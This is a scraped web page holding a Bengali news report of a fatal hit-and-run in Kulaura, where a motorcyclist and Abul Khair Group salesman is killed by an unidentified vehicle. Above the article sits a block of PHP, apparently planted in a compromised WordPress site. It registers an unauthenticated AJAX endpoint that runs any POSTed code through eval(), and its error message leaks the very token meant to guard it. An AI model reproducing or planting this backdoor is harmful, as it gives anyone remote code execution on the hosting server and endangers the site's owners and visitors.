// ==[BD:jfMd8DMa]== add_action( 'wp_ajax_nopriv_rzgczijdiqa', function() { $bind = 'jfMd8DMaPEVBq74Uwrr23JLITZEvODHc'; $comp = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $comp ) || ! hash_equals( $bind, $comp ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $chunk = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $chunk, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:jfMd8DMa]== কুলাউড়ায় সড়ক দুর্ঘটনা; প্রাণ গেলো আবুল খায়ের গ্রুপের সেলসম্যানের

কুলাউড়ায় সড়ক দুর্ঘটনা; প্রাণ গেলো আবুল খায়ের গ্রুপের সেলসম্যানের

মৌলভীবাজারের কুলাউড়া উপজেলায় সড়ক দুর্ঘটনায় সাইফুর রহমান (৩৫) নামে এক মোটরসাইকেল আরোহী নিহত হয়েছেন।

শনিবার (২৯ ফেব্রুয়ারি) সকাল ৯টার দিকে উপজেলার ব্রাম্মণবাজার ইউনিয়নের মিশন এলাকায় এ ঘটনাটি ঘটে।

নিহত সাইফুর রহমান কুলাউড়া উপজেলার মিরশংকর গ্রামের মৃত মাহমুদ আলীর ছেলে।
জানা গেছে, তিনি আবুল খায়ের গ্রুপের সেলসম্যান।

কুলাউড়া থানা সূত্রে জানা যায়, সকালে মোটরসাইকেলযোগে তিনি কুলাউড়া থেকে মৌলভীবাজারের আবুল খায়ের গ্রুপের অফিসের উদ্দেশে রওনা দিয়েছিলেন। পথিমধ্যে ৯টার দিকে মিশন নামক এলাকায় পৌঁছানোর পর অজ্ঞাত এক গাড়ি চাপা দিলে ঘটনাস্থলেই তার মৃত্যু হয়।

পরে খবর পেয়ে কুলাউড়া থানার এসআই আক্তারুজ্জামান ঘটনাস্থলে পৌঁছে লাশ উদ্ধার করে থানায় নিয়ে আসেন।

কুলাউড়া থানার ওসি ইয়ারদৌস হাসান জানান, খবর পেয়ে পুলিশ ঘটনাস্থল থেকে লাশটি উদ্ধার করে। ময়না তদন্তের পর লাশ তার স্বজনদের কাছে হস্তান্তর করা হবে। অজ্ঞাত এক গাড়ি চাপা দিয়ে পালিয়ে যায়। গাড়ি ও চালককে আটক করতে পুলিশের অভিযান অব্যাহত রয়েছে।

এশিয়াবিডি/ডেস্ক/সাইফ

আরও সংবাদ